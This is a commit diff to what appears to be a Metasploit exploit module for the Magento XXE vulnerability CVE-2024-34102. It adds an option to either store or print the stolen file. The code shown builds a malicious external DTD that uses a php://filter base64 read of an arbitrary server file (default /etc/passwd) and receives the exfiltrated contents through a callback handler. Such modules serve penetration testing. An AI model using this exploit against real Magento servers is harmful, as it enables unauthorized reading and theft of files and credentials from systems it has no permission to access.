Gives the user a datastore option

heyder · heyder · commit 8b9b8a2cf029 · 2024-07-17T18:09:46.000+02:00
The user can decide whether or not they want the loot to be stored on disk or printed to the console.
diff --git a/modules/exploits/multi/http/magento_xxe_cve_2024_34102.rb b/modules/exploits/multi/http/magento_xxe_cve_2024_34102.rb
@@ -47,7 +47,8 @@ def initialize(info = {})
     register_options(
       [
         OptString.new('TARGETURI', [ true, 'The base path to the web application', '/']),
-        OptString.new('FILE', [ true, 'The file to read', '/etc/passwd'])
+        OptString.new('TARGETFILE', [ true, 'The target file to read', '/etc/passwd']),
+        OptBool.new('STORE_LOOT', [true, 'Store the target file as loot', false])
       ]
     )
   end
@@ -96,7 +97,7 @@ def dtd_param_name
   end
 
   def make_xxe_dtd
-    filter_path = "php://filter/convert.base64-encode/resource=#{datastore['FILE']}"
+    filter_path = "php://filter/convert.base64-encode/resource=#{datastore['TARGETFILE']}"
     ent_file = rand_text_alpha_lower(4..8)
     %(
       <!ENTITY % #{ent_file} SYSTEM "#{filter_path}">
@@ -121,7 +122,7 @@ def xxe_xml_data
   def xxe_request
     vprint_status('Sending XXE request')
 
-    signature = rand_text_alpha(6)
+    signature = rand_text_alpha(6).capitalize
 
     post_data = <<~EOF
       {
@@ -188,14 +189,18 @@ def on_request_uri(cli, req)
       if data&.empty?
         print_error('No data received')
       else
-        print_good("Received file #{datastore['FILE']} content")
+        
+        file_name = datastore['TARGETFILE']
+        file_data = ::Base64.decode64(data).force_encoding('UTF-8')
+
+        if datastore['STORE_LOOT']
+          p = store_loot(File.basename(file_name), 'text/plain', datastore['RHOST'], file_data, file_name, 'Magento XXE CVE-2024-34102 Results')
+          print_good("File saved in: #{p}")
+        else
+          # A new line is sent before file contents for better readability
+          print_good("File read succeeded! \n#{file_data}")
+        end
 
-        loot_type = 'text/plain'
-        loot_desc = 'Magento XXE CVE-2024-34102 Results'
-        data = ::Base64.decode64(data).force_encoding('UTF-8')
-
-        p = store_loot(datastore['FILE'], loot_type, datastore['RHOST'], data, loot_desc)
-        print_good("File saved in: #{p}")
       end
     else
       print_status("Unexpected request received: '#{req.method} #{req.uri}'")
